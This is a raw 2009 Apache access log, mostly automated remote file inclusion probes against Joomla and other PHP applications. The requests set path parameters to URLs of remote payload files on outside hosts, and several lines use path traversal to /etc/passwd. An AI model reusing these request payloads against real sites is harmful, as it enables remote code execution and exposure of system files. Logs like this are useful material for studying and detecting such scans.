195.34.78.110 - - [30/May/2009:09:44:33 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
195.34.78.110 - - [30/May/2009:09:44:33 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
195.34.78.110 - - [30/May/2009:09:44:34 -0500] "GET /logs/access_log.1239408000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
219.85.63.226 - - [30/May/2009:09:44:34 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
219.85.63.226 - - [30/May/2009:09:44:35 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
219.85.63.226 - - [30/May/2009:09:44:38 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
219.85.63.226 - - [30/May/2009:09:44:39 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
195.34.78.110 - - [30/May/2009:09:44:55 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
195.34.78.110 - - [30/May/2009:09:44:55 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
195.34.78.110 - - [30/May/2009:09:44:55 -0500] "GET /logs/access_log.1239408000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
70.32.106.32 - - [30/May/2009:09:44:57 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/.v6/id.txt%0D?? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
70.32.106.32 - - [30/May/2009:09:44:57 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/.v6/id.txt%0D?? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
195.34.78.110 - - [30/May/2009:09:44:57 -0500] "GET /logs/access_log.1242086400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
205.234.132.157 - - [30/May/2009:09:45:11 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.810"
205.234.132.157 - - [30/May/2009:09:45:11 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 350 "-""libwww-perl/5.810"
195.34.78.110 - - [30/May/2009:09:45:13 -0500] "GET /logs/access_log.1242086400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
75.145.152.113 - - [30/May/2009:09:48:33 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
75.145.152.113 - - [30/May/2009:09:48:34 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
219.85.63.226 - - [30/May/2009:09:48:52 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
219.85.63.226 - - [30/May/2009:09:48:52 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
72.52.131.32 - - [30/May/2009:09:52:58 -0500] "GET /logs//com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.eyepro.net//assets/images/v6-i.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.814"
72.52.131.32 - - [30/May/2009:09:52:59 -0500] "GET //com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.eyepro.net//assets/images/v6-i.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.814"
74.52.2.130 - - [30/May/2009:09:56:24 -0500] "GET /logs///maillist/install/install3.php?database=none&cabsolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.810"
74.52.2.130 - - [30/May/2009:09:56:24 -0500] "GET ///maillist/install/install3.php?database=none&cabsolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
85.18.117.101 - - [30/May/2009:09:59:29 -0500] "GET /logs/access_log.1233964800///maillist/install/install3.php?database=none&cabsolute_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
85.18.117.101 - - [30/May/2009:09:59:29 -0500] "GET /logs///maillist/install/install3.php?database=none&cabsolute_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
85.18.117.101 - - [30/May/2009:09:59:29 -0500] "GET ///maillist/install/install3.php?database=none&cabsolute_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
85.18.117.101 - - [30/May/2009:09:59:33 -0500] "GET /logs/access_log.1234051200///maillist/install/install3.php?database=none&cabsolute_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
219.85.63.226 - - [30/May/2009:10:00:53 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
219.85.63.226 - - [30/May/2009:10:00:54 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
85.18.117.101 - - [30/May/2009:10:01:56 -0500] "GET ///maillist/install/install3.php?database=none&cabsolute_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
85.18.117.101 - - [30/May/2009:10:01:56 -0500] "GET /logs///maillist/install/install3.php?database=none&cabsolute_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
85.18.117.101 - - [30/May/2009:10:01:56 -0500] "GET /logs/access_log.1233964800///maillist/install/install3.php?database=none&cabsolute_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
85.18.117.101 - - [30/May/2009:10:02:00 -0500] "GET /logs/access_log.1234051200///maillist/install/install3.php?database=none&cabsolute_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
75.145.152.113 - - [30/May/2009:10:05:13 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
75.145.152.113 - - [30/May/2009:10:05:13 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
118.127.17.214 - - [30/May/2009:10:09:06 -0500] "GET /logs/joomlahttp://h4ck3d.wsnw.net/mic22.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
118.127.17.214 - - [30/May/2009:10:09:07 -0500] "GET /joomlahttp://h4ck3d.wsnw.net/mic22.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
220.181.7.97 - - [30/May/2009:10:10:46 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
221.139.104.104 - - [30/May/2009:10:13:04 -0500] "GET ///maillist/install/install3.php?database=none&cabsolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
221.139.104.104 - - [30/May/2009:10:13:04 -0500] "GET /logs///maillist/install/install3.php?database=none&cabsolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
221.139.104.104 - - [30/May/2009:10:13:04 -0500] "GET /logs/access_log.1233964800///maillist/install/install3.php?database=none&cabsolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
221.139.104.104 - - [30/May/2009:10:13:28 -0500] "GET /logs/access_log.1234051200///maillist/install/install3.php?database=none&cabsolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
211.234.100.126 - - [30/May/2009:10:15:22 -0500] "GET /logs//citywriter/head.php?path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.234.100.126 - - [30/May/2009:10:15:22 -0500] "GET //citywriter/head.php?path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
211.234.100.126 - - [30/May/2009:10:15:22 -0500] "GET /logs/access_log.1241654400//citywriter/head.php?path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
211.234.100.126 - - [30/May/2009:10:15:45 -0500] "GET /logs/access_log.1240444800//citywriter/head.php?path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
211.234.100.126 - - [30/May/2009:10:16:02 -0500] "GET //citywriter/head.php?path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
211.234.100.126 - - [30/May/2009:10:16:03 -0500] "GET /logs/access_log.1241654400//citywriter/head.php?path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
211.234.100.126 - - [30/May/2009:10:16:03 -0500] "GET /logs//citywriter/head.php?path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.234.100.126 - - [30/May/2009:10:16:29 -0500] "GET /logs/access_log.1240444800//citywriter/head.php?path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
217.147.29.190 - - [30/May/2009:10:19:24 -0500] "GET /logs//appserv/main.php?appserv_root=http://thietbibaoho.net//components/com_virtuemart/idscan.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.808"
217.147.29.190 - - [30/May/2009:10:19:25 -0500] "GET //appserv/main.php?appserv_root=http://thietbibaoho.net//components/com_virtuemart/idscan.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.808"
87.106.135.14 - - [30/May/2009:10:20:14 -0500] "GET /logs/access_log.1239408000//?path%5Bdocroot%5D=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
87.106.135.14 - - [30/May/2009:10:20:14 -0500] "GET //?path%5Bdocroot%5D=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
87.106.135.14 - - [30/May/2009:10:20:15 -0500] "GET /logs/access_log.1242086400//?path%5Bdocroot%5D=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
87.106.135.14 - - [30/May/2009:10:20:16 -0500] "GET /logs//?path%5Bdocroot%5D=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 200 191354 "-""Mozilla/5.0"
82.195.248.50 - - [30/May/2009:10:22:07 -0500] "GET //?path%5Bdocroot%5D=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
82.195.248.50 - - [30/May/2009:10:22:07 -0500] "GET /logs/access_log.1239408000//?path%5Bdocroot%5D=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
82.195.248.50 - - [30/May/2009:10:22:08 -0500] "GET /logs//?path%5Bdocroot%5D=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 200 191354 "-""Mozilla/5.0"
82.195.248.50 - - [30/May/2009:10:22:11 -0500] "GET /logs/access_log.1242086400//?path%5Bdocroot%5D=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:10:27:23 -0500] "GET /logs/index2.php?p=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
85.17.162.28 - - [30/May/2009:10:27:26 -0500] "GET /index2.php?p=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
85.17.162.28 - - [30/May/2009:10:28:08 -0500] "GET /logs/index2.php?p=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
85.17.162.28 - - [30/May/2009:10:28:14 -0500] "GET /index2.php?p=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
85.17.162.28 - - [30/May/2009:10:28:32 -0500] "GET /logs/index2.php?p=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
85.17.162.28 - - [30/May/2009:10:28:34 -0500] "GET /index2.php?p=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
85.17.162.28 - - [30/May/2009:10:29:26 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:10:29:26 -0500] "GET /logs/access_log.1237334400//classes/adodbt/sql.php?classes_dir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:10:29:32 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:10:29:54 -0500] "GET /logs/access_log.1238976000//classes/adodbt/sql.php?classes_dir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:10:31:42 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:10:31:43 -0500] "GET /logs/access_log.1237334400//classes/adodbt/sql.php?classes_dir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:10:31:45 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:10:31:51 -0500] "GET /logs/access_log.1238976000//classes/adodbt/sql.php?classes_dir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:10:31:52 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:10:31:54 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:10:31:54 -0500] "GET /logs/access_log.1237334400//classes/adodbt/sql.php?classes_dir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:10:32:04 -0500] "GET /logs/access_log.1238976000//classes/adodbt/sql.php?classes_dir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
87.106.135.14 - - [30/May/2009:10:32:19 -0500] "GET /logs/access_log.1242000000/?sourcedir=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
87.106.135.14 - - [30/May/2009:10:32:19 -0500] "GET /?sourcedir=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
87.106.135.14 - - [30/May/2009:10:32:20 -0500] "GET /logs/?sourcedir=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 200 191349 "-""Mozilla/5.0"
218.249.36.194 - - [30/May/2009:10:32:55 -0500] "GET //admin/include/lib.module.php?mod_root=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.249.36.194 - - [30/May/2009:10:32:55 -0500] "GET /logs//admin/include/lib.module.php?mod_root=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 317 "-""Mozilla/5.0"
218.249.36.194 - - [30/May/2009:10:32:55 -0500] "GET /logs/access_log.1241222400//admin/include/lib.module.php?mod_root=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 339 "-""Mozilla/5.0"
87.106.135.14 - - [30/May/2009:10:33:28 -0500] "GET /logs/access_log.1241568000/?sourcedir=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.249.36.194 - - [30/May/2009:10:34:18 -0500] "GET //admin/include/lib.module.php?mod_root=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.249.36.194 - - [30/May/2009:10:34:19 -0500] "GET /logs//admin/include/lib.module.php?mod_root=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 317 "-""Mozilla/5.0"
218.249.36.194 - - [30/May/2009:10:34:19 -0500] "GET /logs/access_log.1241222400//admin/include/lib.module.php?mod_root=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.249.36.194 - - [30/May/2009:10:34:48 -0500] "GET /logs/errors.php?error=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.249.36.194 - - [30/May/2009:10:34:49 -0500] "GET /logs/access_log.1237507200/errors.php?error=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.249.36.194 - - [30/May/2009:10:34:49 -0500] "GET /errors.php?error=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.249.36.194 - - [30/May/2009:10:35:30 -0500] "GET /logs/access_log.1238544000/errors.php?error=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
202.54.119.132 - - [30/May/2009:10:36:12 -0500] "GET //includes/function_core.php?web_root=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
202.54.119.132 - - [30/May/2009:10:36:12 -0500] "GET /logs//includes/function_core.php?web_root=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
82.195.248.50 - - [30/May/2009:10:37:42 -0500] "GET /logs/access_log.1242000000/?sourcedir=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
82.195.248.50 - - [30/May/2009:10:37:42 -0500] "GET /?sourcedir=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
82.195.248.50 - - [30/May/2009:10:37:43 -0500] "GET /logs/?sourcedir=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 200 191349 "-""Mozilla/5.0"
82.195.248.50 - - [30/May/2009:10:37:57 -0500] "GET /logs/access_log.1241568000/?sourcedir=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
219.85.63.226 - - [30/May/2009:10:43:25 -0500] "GET //sitemap.php?mosConfig_admin_path=http://www.eann.kr//idi.txt?%0D?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
219.85.63.226 - - [30/May/2009:10:43:25 -0500] "GET /logs//sitemap.php?mosConfig_admin_path=http://www.eann.kr//idi.txt?%0D?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
121.0.141.241 - - [30/May/2009:10:44:45 -0500] "GET /logs/access_log.1236384000//include/mail.inc.php?skin_board_path=http://www.damigallery.co.kr/board/data/id.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
121.0.141.241 - - [30/May/2009:10:44:45 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.damigallery.co.kr/board/data/id.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
121.0.141.241 - - [30/May/2009:10:44:45 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.damigallery.co.kr/board/data/id.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:10:45:12 -0500] "GET /logs/access_log.1239667200/?DOCUMENT_ROOT=http://www.zodiak.lv////ftp/fx29id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:10:45:12 -0500] "GET /?DOCUMENT_ROOT=http://www.zodiak.lv////ftp/fx29id1.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:10:45:14 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.zodiak.lv////ftp/fx29id1.txt??? HTTP/1.1" 200 191349 "-""Mozilla/5.0"
203.94.155.59 - - [30/May/2009:10:45:15 -0500] "GET /logs/access_log.1230768000///vwar/backup/errors.php?error=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
203.94.155.59 - - [30/May/2009:10:45:15 -0500] "GET ///vwar/backup/errors.php?error=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
203.94.155.59 - - [30/May/2009:10:45:15 -0500] "GET /logs///vwar/backup/errors.php?error=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
203.94.155.59 - - [30/May/2009:10:45:15 -0500] "GET /logs/access_log.1229644800///vwar/backup/errors.php?error=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:10:45:30 -0500] "GET /?DOCUMENT_ROOT=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:10:45:30 -0500] "GET /logs/access_log.1239667200/?DOCUMENT_ROOT=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:10:45:30 -0500] "GET /logs/access_log.1238889600/?DOCUMENT_ROOT=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:10:45:31 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 200 191349 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:10:45:46 -0500] "GET /logs/access_log.1238889600/?DOCUMENT_ROOT=http://www.zodiak.lv////ftp/fx29id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.249.36.194 - - [30/May/2009:10:45:53 -0500] "GET /errors.php?error=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.249.36.194 - - [30/May/2009:10:45:53 -0500] "GET /logs/errors.php?error=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.249.36.194 - - [30/May/2009:10:45:53 -0500] "GET /logs/access_log.1237507200/errors.php?error=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.249.36.194 - - [30/May/2009:10:46:34 -0500] "GET /logs/access_log.1238544000/errors.php?error=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
77.232.66.165 - - [30/May/2009:10:46:47 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.eann.kr//idi.txt?%0D?? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
77.232.66.165 - - [30/May/2009:10:46:47 -0500] "GET //include/lib.inc.php?site_path=http://www.eann.kr//idi.txt?%0D?? HTTP/1.1" 404 303 "-""libwww-perl/5.810"
80.237.146.58 - - [30/May/2009:10:47:58 -0500] "GET /logs/access_log.1229644800///vwar/backup/errors.php?error=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
80.237.146.58 - - [30/May/2009:10:47:58 -0500] "GET ///vwar/backup/errors.php?error=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
80.237.146.58 - - [30/May/2009:10:47:58 -0500] "GET /logs/access_log.1230768000///vwar/backup/errors.php?error=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
80.237.146.58 - - [30/May/2009:10:47:58 -0500] "GET /logs///vwar/backup/errors.php?error=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.188.238.2 - - [30/May/2009:10:48:10 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
72.188.238.2 - - [30/May/2009:10:48:10 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
72.188.238.2 - - [30/May/2009:10:48:10 -0500] "GET /logs/access_log.1242086400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
72.188.238.2 - - [30/May/2009:10:48:12 -0500] "GET /logs/access_log.1242000000//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
218.38.243.71 - - [30/May/2009:10:48:38 -0500] "GET /logs/access_log.1240444800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 362 "-""Mozilla/5.0"
